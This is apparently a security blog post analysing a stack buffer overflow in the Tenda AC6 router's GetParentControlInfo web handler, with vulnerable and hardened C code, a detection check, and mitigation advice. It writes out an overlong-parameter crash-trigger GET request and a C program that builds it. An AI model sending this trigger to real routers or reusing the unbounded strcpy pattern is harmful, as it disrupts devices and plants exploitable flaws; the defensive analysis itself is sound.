A vulnerability rated critical and tracked as CVE-2025-0349 has been discovered in Tenda AC6 routers running firmware 15.03.05.16. The affected function is GetParentControlInfo in the file /goform/GetParentControlInfo. Manipulation of the src argument of that request causes a stack-based buffer overflow, and the attack can be launched remotely. A proof-of-concept exploit has been disclosed publicly, and other parameters of the same handler may be affected as well. In this post we analyze the vulnerability, look at a code snippet, and discuss exploit details.
Vulnerability Analysis
The GetParentControlInfo function is part of the web management interface (the httpd daemon) of the Tenda AC6. Overflowing the stack buffer corrupts the saved registers and return address of the handler: at minimum this crashes the web server (a denial of service), and with a controlled return address it can lead to remote code execution with the privileges of the httpd process, which on this class of embedded device typically runs as root, giving the attacker control of the device.
An attacker exploits the flaw by sending a specially crafted HTTP GET request for /goform/GetParentControlInfo to the router. Whether the handler is reachable without credentials depends on the firmware's authentication checks for /goform endpoints, so verify that on the target firmware rather than assuming it.
The critical element is the handling of the 'src' argument of the GET request: its value is copied into a fixed-size stack buffer without a length check, so a sufficiently long value overwrites the stack beyond the buffer and may lead to a crash or to execution of attacker-controlled code.
Here is a simplified code snippet that illustrates the vulnerable pattern in the GetParentControlInfo function (getValue and checkBuffer stand in for the firmware's own request-parsing and validation helpers):
#include <string.h>

const char *getValue(const char *name); /* returns the value of an HTTP request parameter (stand-in for the firmware helper) */
int checkBuffer(const char *buf);       /* validates the copied value; negative on failure */

int GetParentControlInfo(void)
{
    char src[64];                 /* fixed-size stack buffer */
    int nResult;

    strcpy(src, getValue("src")); /* copies the "src" argument with no length check: the overflow */
    nResult = checkBuffer(src);   /* validation happens only after the unbounded copy */
    if (nResult < 0) {
        return nResult;
    }
    /* ...rest of the code omitted for brevity */
    return 0;
}
In the code snippet above, GetParentControlInfo defines a src buffer with a fixed size of 64 bytes, so it can hold at most 63 characters plus the terminating NUL. It then copies the src argument from the HTTP request with strcpy(). This is where the vulnerability lies: strcpy() copies until it finds a NUL in the source and never looks at the destination size, so a longer src value runs past the end of the buffer into whatever the compiler placed above it on the stack, including the saved return address. Note that the call to checkBuffer() comes after the copy, so the validation cannot prevent the overflow; the length must be checked before any byte is written. Whether the overflow is exploitable beyond a crash depends on the mitigations compiled into the httpd binary (stack canaries, NX, ASLR), which should be checked on the actual firmware binary (for example with checksec) before assuming code execution.
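As an added example (this is not code from the original post and not Tenda's firmware), the following C program models the vulnerable copy next to a hardened version of the same handler. It takes the parameter value directly instead of parsing HTTP, and the 64-byte buffer size follows the snippet above; SRC_BUF_SIZE, vuln_handler, safe_handler and overflow_bytes are names chosen here for illustration.

```c
#include <stdio.h>
#include <string.h>

#define SRC_BUF_SIZE 64   /* buffer size assumed from the snippet above */

/* Vulnerable pattern: trusts the length of the "src" value and copies it
 * into a 64-byte stack buffer with strcpy(). Anything longer than 63 bytes
 * (plus the NUL) runs off the end of src[] into saved registers and the
 * return address. It is only ever called with short input in this program;
 * with long input the behaviour is undefined (crash or worse). */
int vuln_handler(const char *src_value)
{
    char src[SRC_BUF_SIZE];
    strcpy(src, src_value);            /* no bound check: the bug */
    return (int)strlen(src);
}

/* Hardened pattern: check the length before writing a single byte, then use
 * a bounded copy so a later edit cannot silently reintroduce the overflow. */
int safe_handler(const char *src_value)
{
    char src[SRC_BUF_SIZE];
    size_t len = strlen(src_value);

    if (len >= sizeof(src)) {
        /* Reject rather than truncate: a truncated IP or MAC string would
         * also be a correctness problem further down the handler. */
        return -1;
    }
    memcpy(src, src_value, len + 1);   /* len + 1 copies the NUL as well */
    return (int)len;
}

/* How many bytes a "src" value of the given length writes past the end of a
 * SRC_BUF_SIZE buffer under strcpy() (0 when it fits, NUL included). */
size_t overflow_bytes(size_t value_len)
{
    size_t needed = value_len + 1;
    return needed > SRC_BUF_SIZE ? needed - SRC_BUF_SIZE : 0;
}

int main(void)
{
    char longval[200];                 /* constructed sample: 199 'A's */
    memset(longval, 'A', sizeof(longval) - 1);
    longval[sizeof(longval) - 1] = '\0';

    printf("safe_handler(short) = %d\n", safe_handler("192.168.0.100"));
    printf("safe_handler(long)  = %d\n", safe_handler(longval));
    printf("vuln_handler(short) = %d\n", vuln_handler("192.168.0.100"));
    printf("199-byte src overflows the buffer by %zu bytes\n",
           overflow_bytes(199));
    return 0;
}
```

The hardened version rejects any value of 64 bytes or more before touching the buffer, which is the ordering the original handler gets wrong: it validates only after the unbounded copy has already happened.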
Exploit Details
As mentioned earlier, the exploit consists of a specially crafted HTTP GET request to the target router, with an overlong value in the 'src' argument to trigger the stack-based buffer overflow. Here is the shape of a request that triggers the vulnerability:
GET /goform/GetParentControlInfo?src=AAAA...AAAA HTTP/1.1    (src value longer than 64 bytes)
Host: <target-router-ip>
User-Agent: Exploit-CVE-2025-0349
A request like this is only a crash trigger. Turning it into code execution requires the exact offset from the start of the buffer to the saved return address and a usable return target, both of which depend on the firmware build and must be determined against the actual httpd binary with a debugger or emulation.
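As an added example (not from the original post and not from the public proof of concept), the following C program builds the trigger request above offline with a configurable amount of padding, and beside it implements the matching detection check a WAF or IDS rule would express: flag any request for the vulnerable endpoint whose src value is 64 bytes or longer. build_request, src_param_len and is_overflow_attempt are names chosen here; the target host is a constructed sample and nothing is sent over the network.

```c
#include <stdio.h>
#include <string.h>

#define SRC_BUF_SIZE 64   /* handler buffer size assumed from the page's snippet */

/* Build the trigger request into out: "pad" bytes of 'A' as the src value.
 * Returns the request length, or -1 if out is too small. No network I/O. */
int build_request(char *out, size_t outsz, const char *host, size_t pad)
{
    const char *pfx = "GET /goform/GetParentControlInfo?src=";
    const char *mid = " HTTP/1.1\r\nHost: ";
    const char *end = "\r\nUser-Agent: Exploit-CVE-2025-0349\r\n\r\n";
    size_t need = strlen(pfx) + pad + strlen(mid) + strlen(host) + strlen(end) + 1;
    char *p = out;

    if (need > outsz)
        return -1;
    memcpy(p, pfx, strlen(pfx));   p += strlen(pfx);
    memset(p, 'A', pad);           p += pad;
    memcpy(p, mid, strlen(mid));   p += strlen(mid);
    memcpy(p, host, strlen(host)); p += strlen(host);
    memcpy(p, end, strlen(end));   p += strlen(end);
    *p = '\0';
    return (int)(p - out);
}

/* Detection side: length in bytes of the src= value in the request line,
 * or -1 if the request is not a GET for the vulnerable endpoint or carries
 * no src parameter. Only the request line is inspected. */
int src_param_len(const char *req)
{
    const char *path = "/goform/GetParentControlInfo";
    const char *line_end, *q, *v, *e;

    if (strncmp(req, "GET ", 4) != 0)
        return -1;
    line_end = strstr(req, "\r\n");
    if (!line_end)
        line_end = req + strlen(req);
    q = strstr(req + 4, path);
    if (!q || q > line_end)
        return -1;
    /* locate "src=" as a parameter name, i.e. preceded by '?' or '&' */
    v = strstr(q, "src=");
    while (v && v < line_end && v[-1] != '?' && v[-1] != '&')
        v = strstr(v + 1, "src=");
    if (!v || v >= line_end)
        return -1;
    v += 4;
    e = v;
    while (e < line_end && *e != '&' && *e != ' ')
        e++;
    return (int)(e - v);
}

/* A value of SRC_BUF_SIZE bytes or more cannot fit with its NUL terminator
 * in a SRC_BUF_SIZE buffer, so anything at or above that is an attempt. */
int is_overflow_attempt(const char *req)
{
    return src_param_len(req) >= SRC_BUF_SIZE;
}

int main(void)
{
    char req[512];
    int n = build_request(req, sizeof req, "192.168.0.1", 200); /* constructed target */

    if (n < 0)
        return 1;
    printf("%s", req);
    printf("src length: %d, overflow attempt: %d\n",
           src_param_len(req), is_overflow_attempt(req));
    return 0;
}
```

The detector measures the raw query bytes. Percent-encoded values decode to at most as many bytes as they occupy on the wire, so the raw length can only overestimate the decoded length: the check produces no false negatives from encoding, but a real rule should decode before measuring to avoid flagging long but harmless encoded values.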
Links to Original References
- CVE-2025-0349 Official Listing
- Advisory on Tenda Vendor Website
Conclusion
CVE-2025-0349 is a critical vulnerability in the Tenda AC6 firmware, specifically a stack-based buffer overflow in the GetParentControlInfo function reached through /goform/GetParentControlInfo. It poses a significant risk to users: an attacker who can reach the web interface can crash it and may be able to obtain remote control of the device. Router owners should apply firmware updates as soon as the vendor releases them, make sure the management interface is not reachable from the WAN, restrict administrative access to trusted hosts on the LAN, and keep track of new developments concerning this vulnerability.
Disclaimer: The information contained in this post is for educational and informational purposes only and does not advocate unauthorized access to or exploitation of any network devices.
Timeline
Published on: 01/09/2025 11:15:16 UTC